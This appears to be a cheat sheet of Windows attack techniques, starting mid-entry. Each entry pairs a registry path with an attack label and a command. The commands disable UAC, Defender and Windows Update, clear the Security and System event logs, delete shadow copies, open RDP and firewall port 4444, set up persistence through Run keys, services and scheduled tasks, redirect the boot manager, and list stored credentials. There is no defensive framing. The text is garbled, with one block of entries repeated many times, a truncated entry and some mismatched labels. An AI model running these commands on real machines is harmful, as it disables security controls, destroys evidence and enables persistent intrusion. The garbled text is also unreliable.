Codes:reg add HKLM\SYSTEM\CurrentControlSet\Services\DriverDatabase /v EvilDriver /t REG_SZ /d "evildriver.sys"

Remote Desktop Configuration

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
Attacks: Unauthorized Remote Access
Codes:reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

Autorun Settings Manipulation

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
Attacks: Malware Execution via Removable Media
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 0

User Account Control (UAC) Bypass

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Attacks: Privilege Escalation, UAC Bypass
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0

Windows Defender Manipulation

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Windows Defender
Attacks: Antivirus Bypass, Malware Execution
Codes:reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1

Boot Configuration Data

Registry Path:HKLM\BCD00000000
Attacks: Bootkit Installation, System Integrity Compromise
Codes:bcdedit /set {bootmgr} path \EFI\evil\evilmgr.efi

Windows Update Manipulation

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
Attacks: Denial of Service, System Vulnerability Exploitation
Codes:reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate /v DisableWindowsUpdateAccess /t REG_DWORD /d 1

Windows Activation Bypass

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
Attacks: Software Piracy, Licensing Bypass
Codes:slmgr /ipk XXXXX-XXXXX-XXXXX-XXXXX-XXXXX

Event Log Manipulation

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\Eventlog
Attacks: Evidence Tampering, Audit Bypass
Codes:wevtutil cl System

Windows Error Reporting Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting
Attacks: Information Disclosure, Crash Analysis Bypass
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting /v Disabled /t REG_DWORD /d 1

Application Compatibility Shims

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
Attacks: Privilege Escalation, Application Bypass
Codes:sdbinst evil.sdb

Power Settings Manipulation

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Power
Attacks: Denial of Service, Energy Consumption Manipulation
Codes:powercfg /setactive evilpowerplan

Windows Firewall Rule Manipulation

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules
Attacks: Unauthorized Access, Firewall Bypass
Codes:netsh advfirewall firewall add rule name="EvilRule" dir=in action=allow protocol=TCP localport=4444

Windows Script Host Control

Registry Path:HKCU\Software\Microsoft\Windows Script Host\Settings
Attacks: Script Execution Control, Malware Execution
Codes:reg add HKCU\Software\Microsoft\Windows Script Host\Settings /v Enabled /t REG_DWORD /d 0

Windows Sidebar Gadgets Control

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Windows\Sidebar
Attacks: Malicious Gadget Execution, Information Disclosure
Codes:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Windows\Sidebar /v TurnOffSidebar /t REG_DWORD /d 1

Windows Task Scheduler Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule
Attacks: Scheduled Task Manipulation, Persistence
Codes:schtasks /create /tn EvilTask /tr evil.exe /sc daily

Windows Services Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services
Attacks: Service Manipulation, Privilege Escalation
Codes:sc create EvilService binPath= "evil.exe"

Windows System Restore Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
Attacks: System Restore Manipulation, Evidence Tampering
Codes:vssadmin delete shadows /all

Windows Remote Management Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
Attacks: Unauthorized Remote Access, System Control
Codes:winrm quickconfig -q

Windows Remote Desktop Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
Attacks: Unauthorized Remote Access, System Control
Codes:reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

Windows Remote Assistance Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Assistance\Client\1.0
Attacks: Unauthorized Remote Access, System Control
Codes:msra /offerRA

Windows File Association Control

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Attacks: File Association Hijacking, Malware Execution
Codes:assoc .txt=evilprogid

Windows Network Shares Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares
Attacks: Unauthorized Network Access, Data Theft
Codes:net share EvilShare=C:\evil

Windows Network Settings Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
Attacks: Network Manipulation, Man-in-the-Middle
Codes:netsh interface ip set dns "Local Area Connection" static 1.2.3.4

Windows Driver Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Class
Attacks: Driver Manipulation, Kernel-Level Control
Codes:pnputil /add-driver evil.inf

Windows Boot Control

Registry Path:HKLM\BCD00000000
Attacks: Boot Manipulation, System Integrity Compromise
Codes:bcdedit /set {bootmgr} path \EFI\evil\evilmgr.efi

Windows Activation Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
Attacks: Activation Bypass, Licensing Manipulation
Codes:slmgr /rearm

Windows Update Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
Attacks: Update Manipulation, Vulnerability Exploitation
Codes:wuauclt /detectnow

Windows Firewall Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
Attacks: Firewall Bypass, Unauthorized Access
Codes:netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Windows Security Center Control

Registry Path:HKLM\SOFTWARE\Microsoft\Security Center
Attacks: Security Alert Suppression, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusDisableNotify /t REG_DWORD /d 1

Windows Event Viewer Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\EventViewer
Attacks: Log Manipulation, Evidence Tampering
Codes:wevtutil cl Security

Windows Performance Monitor Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
Attacks: System Monitoring, Data Theft
Codes:logman create counter EvilMonitor -o "C:\evil.log" -f csv -v mmddhhmm -c "\Processor(_Total)\% Processor Time"

Windows Power Configuration Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Power
Attacks: Energy Consumption Manipulation, Denial of Service
Codes:powercfg /hibernate off

Windows Credential Manager Control

Registry Path:HKLM\SOFTWARE\Microsoft\Cryptography\Protect\Providers\df9d8cd0-1501-11d1-8c7a-00c04fc297eb
Attacks: Credential Theft, Data Decryption
Codes:cmdkey /list

Windows Task Scheduler Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache
Attacks: Scheduled Task Manipulation, Persistence
Codes:schtasks /create /tn EvilTask /tr evil.exe /sc daily

Windows System Restore Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
Attacks: System Restore Manipulation, Evidence Tampering
Codes:vssadmin delete shadows /all

Windows Remote Management Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
Attacks: Unauthorized Remote Access, System Control
Codes:winrm quickconfig -q

Windows Remote Desktop Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
Attacks: Unauthorized Remote Access, System Control
Codes:reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

Windows Remote Assistance Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Assistance\Client\1.0
Attacks: Unauthorized Remote Access, System Control
Codes:msra /offerRA

Windows File Association Control

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Attacks: File Association Hijacking, Malware Execution
Codes:assoc .txt=evilprogid

Windows Network Shares Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares
Attacks: Unauthorized Network Access, Data Theft
Codes:net share EvilShare=C:\evil

Windows Network Settings Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
Attacks: Network Manipulation, Man-in-the-Middle
Codes:netsh interface ip set dns "Local Area Connection" static 1.2.3.4

Windows Driver Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Class
Attacks: Driver Manipulation, Kernel-Level Control
Codes:pnputil /add-driver evil.inf

Windows Boot Control

Registry Path:HKLM\BCD00000000
Attacks: Boot Manipulation, System Integrity Compromise
Codes:bcdedit /set {bootmgr} path \EFI\evil\evilmgr.efi

Windows Activation Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
Attacks: Activation Bypass, Licensing Manipulation
Codes:slmgr /rearm

Windows Update Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
Attacks: Update Manipulation, Vulnerability Exploitation
Codes:wuauclt /detectnow

Windows Firewall Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
Attacks: Firewall Bypass, Unauthorized Access
Codes:netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Windows Security Center Control

Registry Path:HKLM\SOFTWARE\Microsoft\Security Center
Attacks: Security Alert Suppression, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusDisableNotify /t REG_DWORD /d 1

Windows Event Viewer Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\EventViewer
Attacks: Log Manipulation, Evidence Tampering
Codes:wevtutil cl Security

Windows Performance Monitor Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
Attacks: System Monitoring, Data Theft
Codes:logman create counter EvilMonitor -o "C:\evil.log" -f csv -v mmddhhmm -c "\Processor(_Total)\% Processor Time"

Windows Power Configuration Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Power
Attacks: Energy Consumption Manipulation, Denial of Service
Codes:powercfg /hibernate off

Windows Credential Manager Control

Registry Path:HKLM\SOFTWARE\Microsoft\Cryptography\Protect\Providers\df9d8cd0-1501-11d1-8c7a-00c04fc297eb
Attacks: Credential Theft, Data Decryption
Codes:cmdkey /list

Windows Task Scheduler Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache
Attacks: Scheduled Task Manipulation, Persistence
Codes:schtasks /create /tn EvilTask /tr evil.exe /sc daily

Windows System Restore Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
Attacks: System Restore Manipulation, Evidence Tampering
Codes:vssadmin delete shadows /all

Windows Remote Management Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
Attacks: Unauthorized Remote Access, System Control
Codes:winrm quickconfig -q

Windows Remote Desktop Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
Attacks: Unauthorized Remote Access, System Control
Codes:reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

Windows Remote Assistance Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Assistance\Client\1.0
Attacks: Unauthorized Remote Access, System Control
Codes:msra /offerRA

Windows File Association Control

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Attacks: File Association Hijacking, Malware Execution
Codes:assoc .txt=evilprogid

Windows Network Shares Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares
Attacks: Unauthorized Network Access, Data Theft
Codes:net share EvilShare=C:\evil

Windows Network Settings Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
Attacks: Network Manipulation, Man-in-the-Middle
Codes:netsh interface ip set dns "Local Area Connection" static 1.2.3.4

Windows Driver Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Class
Attacks: Driver Manipulation, Kernel-Level Control
Codes:pnputil /add-driver evil.inf

Windows Boot Control

Registry Path:HKLM\BCD00000000
Attacks: Boot Manipulation, System Integrity Compromise
Codes:bcdedit /set {bootmgr} path \EFI\evil\evilmgr.efi

Windows Activation Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
Attacks: Activation Bypass, Licensing Manipulation
Codes:slmgr /rearm

Windows Update Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
Attacks: Update Manipulation, Vulnerability Exploitation
Codes:wuauclt /detectnow

Windows Firewall Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
Attacks: Firewall Bypass, Unauthorized Access
Codes:netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Windows Security Center Control

Registry Path:HKLM\SOFTWARE\Microsoft\Security Center
Attacks: Security Alert Suppression, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusDisableNotify /t REG_DWORD /d 1

Windows Event Viewer Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\EventViewer
Attacks: Log Manipulation, Evidence Tampering
Codes:wevtutil cl Security

Windows Performance Monitor Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
Attacks: System Monitoring, Data Theft
Codes:logman create counter EvilMonitor -o "C:\evil.log" -f csv -v mmddhhmm -c "\Processor(_Total)\% Processor Time"

Windows Power Configuration Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Power
Attacks: Energy Consumption Manipulation, Denial of Service
Codes:powercfg /hibernate off

Windows Credential Manager Control

Registry Path:HKLM\SOFTWARE\Microsoft\Cryptography\Protect\Providers\df9d8cd0-1501-11d1-8c7a-00c04fc297eb
Attacks: Credential Theft, Data Decryption
Codes:cmdkey /list

Windows Task Scheduler Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache
Attacks: Scheduled Task Manipulation, Persistence
Codes:schtasks /create /tn EvilTask /tr evil.exe /sc daily

Windows System Restore Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
Attacks: System Restore Manipulation, Evidence Tampering
Codes:vssadmin delete shadows /all

Windows Remote Management Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
Attacks: Unauthorized Remote Access, System Control
Codes:winrm quickconfig -q

Windows Remote Desktop Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
Attacks: Unauthorized Remote Access, System Control
Codes:reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

Windows Remote Assistance Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Assistance\Client\1.0
Attacks: Unauthorized Remote Access, System Control
Codes:msra /offerRA

Windows File Association Control

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Attacks: File Association Hijacking, Malware Execution
Codes:assoc .txt=evilprogid

Windows Network Shares Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares
Attacks: Unauthorized Network Access, Data Theft
Codes:net share EvilShare=C:\evil

Windows Network Settings Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
Attacks: Network Manipulation, Man-in-the-Middle
Codes:netsh interface ip set dns "Local Area Connection" static 1.2.3.4

Windows Driver Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Class
Attacks: Driver Manipulation, Kernel-Level Control
Codes:pnputil /add-driver evil.inf

Windows Boot Control

Registry Path:HKLM\BCD00000000
Attacks: Boot Manipulation, System Integrity Compromise
Codes:bcdedit /set {bootmgr} path \EFI\evil\evilmgr.efi

Windows Activation Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
Attacks: Activation Bypass, Licensing Manipulation
Codes:slmgr /rearm

Windows Update Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
Attacks: Update Manipulation, Vulnerability Exploitation
Codes:wuauclt /detectnow

Windows Firewall Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
Attacks: Firewall Bypass, Unauthorized Access
Codes:netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Windows Security Center Control

Registry Path:HKLM\SOFTWARE\Microsoft\Security Center
Attacks: Security Alert Suppression, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusDisableNotify /t REG_DWORD /d 1

Windows Event Viewer Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\EventViewer
Attacks: Log Manipulation, Evidence Tampering
Codes:wevtutil cl Security

Windows Performance Monitor Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
Attacks: System Monitoring, Data Theft
Codes:logman create counter EvilMonitor -o "C:\evil.log" -f csv -v mmddhhmm -c "\Processor(_Total)\% Processor Time"

Windows Power Configuration Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Power
Attacks: Energy Consumption Manipulation, Denial of Service
Codes:powercfg /hibernate off

Windows Credential Manager Control

Registry Path:HKLM\SOFTWARE\Microsoft\Cryptography\Protect\Providers\df9d8cd0-1501-11d1-8c7a-00c04fc297eb
Attacks: Credential Theft, Data Decryption
Codes:cmdkey /list

Windows Task Scheduler Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache
Attacks: Scheduled Task Manipulation, Persistence
Codes:schtasks /create /tn EvilTask /tr evil.exe /sc daily

Windows System Restore Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
Attacks: System Restore Manipulation, Evidence Tampering
Codes:vssadmin delete shadows /all

Windows Remote Management Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
Attacks: Unauthorized Remote Access, System Control
Codes:winrm quickconfig -q

Windows Remote Desktop Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
Attacks: Unauthorized Remote Access, System Control
Codes:reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

Windows Remote Assistance Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Assistance\Client\1.0
Attacks: Unauthorized Remote Access, System Control
Codes:msra /offerRA

Windows File Association Control

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Attacks: File Association Hijacking, Malware Execution
Codes:assoc .txt=evilprogid

Windows Network Shares Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares
Attacks: Unauthorized Network Access, Data Theft
Codes:net share EvilShare=C:\evil

Windows Network Settings Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
Attacks: Network Manipulation, Man-in-the-Middle
Codes:netsh interface ip set dns "Local Area Connection" static 1.2.3.4

Windows Driver Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Class
Attacks: Driver Manipulation, Kernel-Level Control
Codes:pnputil /add-driver evil.inf

Windows Boot Control

Registry Path:HKLM\BCD00000000
Attacks: Boot Manipulation, System Integrity Compromise
Codes:bcdedit /set {bootmgr} path \EFI\evil\evilmgr.efi

Windows Activation Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
Attacks: Activation Bypass, Licensing Manipulation
Codes:slmgr /rearm

Windows Update Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
Attacks: Update Manipulation, Vulnerability Exploitation
Codes:wuauclt /detectnow

Windows Firewall Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
Attacks: Firewall Bypass, Unauthorized Access
Codes:netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Windows Security Center Control

Registry Path:HKLM\SOFTWARE\Microsoft\Security Center
Attacks: Security Alert Suppression, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusDisableNotify /t REG_DWORD /d 1

Windows Event Viewer Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\EventViewer
Attacks: Log Manipulation, Evidence Tampering
Codes:wevtutil cl Security

Windows Performance Monitor Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
Attacks: System Monitoring, Data Theft
Codes:logman create counter EvilMonitor -o "C:\evil.log" -f csv -v mmddhhmm -c "\Processor(_Total)\% Processor Time"

Windows Power Configuration Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Power
Attacks: Energy Consumption Manipulation, Denial of Service
Codes:powercfg /hibernate off

Windows Credential Manager Control

Registry Path:HKLM\SOFTWARE\Microsoft\Cryptography\Protect\Providers\df9d8cd0-1501-11d1-8c7a-00c04fc297eb
Attacks: Credential Theft, Data Decryption
Codes:cmdkey /list

Windows Task Scheduler Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache
Attacks: Scheduled Task Manipulation, Persistence
Codes:schtasks /create /tn EvilTask /tr evil.exe /sc daily

Windows System Restore Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
Attacks: System Restore Manipulation, Evidence Tampering
Codes:vssadmin delete shadows /all

Windows Remote Management Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
Attacks: Unauthorized Remote Access, System Control
Codes:winrm quickconfig -q

Windows Remote Desktop Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
Attacks: Unauthorized Remote Access, System Control
Codes:reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

Windows Remote Assistance Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Assistance\Client\1.0
Attacks: Unauthorized Remote Access, System Control
Codes:msra /offerRA

Windows File Association Control

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Attacks: File Association Hijacking, Malware Execution
Codes:assoc .txt=evilprogid

Windows Network Shares Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares
Attacks: Unauthorized Network Access, Data Theft
Codes:net share EvilShare=C:\evil

Windows Network Settings Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
Attacks: Network Manipulation, Man-in-the-Middle
Codes:netsh interface ip set dns "Local Area Connection" static 1.2.3.4

Windows Driver Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Class
Attacks: Driver Manipulation, Kernel-Level Control
Codes:pnputil /add-driver evil.inf

Windows Boot Control

Registry Path:HKLM\BCD00000000
Attacks: Boot Manipulation, System Integrity Compromise
Codes:bcdedit /set {bootmgr} path \EFI\evil\evilmgr.efi

Windows Activation Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
Attacks: Activation Bypass, Licensing Manipulation
Codes:slmgr /rearm

Windows Update Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
Attacks: Update Manipulation, Vulnerability Exploitation
Codes:wuauclt /detectnow

Windows Firewall Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
Attacks: Firewall Bypass, Unauthorized Access
Codes:netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Windows Security Center Control

Registry Path:HKLM\SOFTWARE\Microsoft\Security Center
Attacks: Security Alert Suppression, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusDisableNotify /t REG_DWORD /d 1

Windows Event Viewer Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\EventViewer
Attacks: Log Manipulation, Evidence Tampering
Codes:wevtutil cl Security

Windows Performance Monitor Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
Attacks: System Monitoring, Data Theft
Codes:logman create counter EvilMonitor -o "C:\evil.log" -f csv -v mmddhhmm -c "\Processor(_Total)\% Processor Time"

Windows Power Configuration Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Power
Attacks: Energy Consumption Manipulation, Denial of Service
Codes:powercfg /hibernate off

Windows Credential Manager Control

Registry Path:HKLM\SOFTWARE\Microsoft\Cryptography\Protect\Providers\df9d8cd0-1501-11d1-8c7a-00c04fc297eb
Attacks: Credential Theft, Data Decryption
Codes:cmdkey /list

Windows Task Scheduler Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache
Attacks: Scheduled Task Manipulation, Persistence
Codes:schtasks /create /tn EvilTask /tr evil.exe /sc daily

Windows System Restore Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore
Attacks: System Restore Manipulation, Evidence Tampering
Codes:vssadmin delete shadows /all

Windows Remote Management Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
Attacks: Unauthorized Remote Access, System Control
Codes:winrm quickconfig -q

Windows Remote Desktop Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
Attacks: Unauthorized Remote Access, System Control
Codes:reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

Windows Remote Assistance Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Assistance\Client\1.0
Attacks: Unauthorized Remote Access, System Control
Codes:msra /offerRA

Windows File Association Control

Registry Path:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Attacks: File Association Hijacking, Malware Execution
Codes:assoc .txt=evilprogid

Windows Network Shares Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares
Attacks: Unauthorized Network Access, Data Theft
Codes:net share EvilShare=C:\evil

Windows Network Settings Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
Attacks: Network Manipulation, Man-in-the-Middle
Codes:netsh interface ip set dns "Local Area Connection" static 1.2.3.4

Windows Driver Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Control\Class
Attacks: Driver Manipulation, Kernel-Level Control
Codes:pnputil /add-driver evil.inf

Windows Boot Control

Registry Path:HKLM\BCD00000000
Attacks: Boot Manipulation, System Integrity Compromise
Codes:bcdedit /set {bootmgr} path \EFI\evil\evilmgr.efi

Windows Activation Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
Attacks: Activation Bypass, Licensing Manipulation
Codes:slmgr /rearm

Windows Update Control

Registry Path:HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
Attacks: Update Manipulation, Vulnerability Exploitation
Codes:wuauclt /detectnow

Windows Firewall Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy
Attacks: Firewall Bypass, Unauthorized Access
Codes:netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Windows Security Center Control

Registry Path:HKLM\SOFTWARE\Microsoft\Security Center
Attacks: Security Alert Suppression, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusDisableNotify /t REG_DWORD /d 1

Windows Event Viewer Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\EventViewer
Attacks: Log Manipulation, Evidence Tampering
Codes:wevtutil cl Security

Windows Performance Monitor Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
Attacks: System Monitoring, Data Theft
Codes:logman create counter EvilMonitor -o "C:\evil.log" -f csv -v mmddhhmm -c "\Processor(_Total)\% Processor Time"

Windows Power Configuration Control

Codes:assoc .txt=evilprogid

Windows Service Control

Registry Path:HKLM\SYSTEM\CurrentControlSet\Services
Attacks: Service Manipulation, Privilege Escalation
Codes:sc create EvilService binPath= "C:\evil\evil.exe"

Windows User Account Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Attacks: UAC Bypass, Privilege Escalation
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0

Windows Autorun Control

Registry Path:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Attacks: Persistence, Malware Execution
Codes:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v EvilApp /t REG_SZ /d "C:\evil\evil.exe"

Windows MIME Type Control

Registry Path:HKCR\MIME\Database\Content Type
Attacks: MIME Type Hijacking, Malware Execution
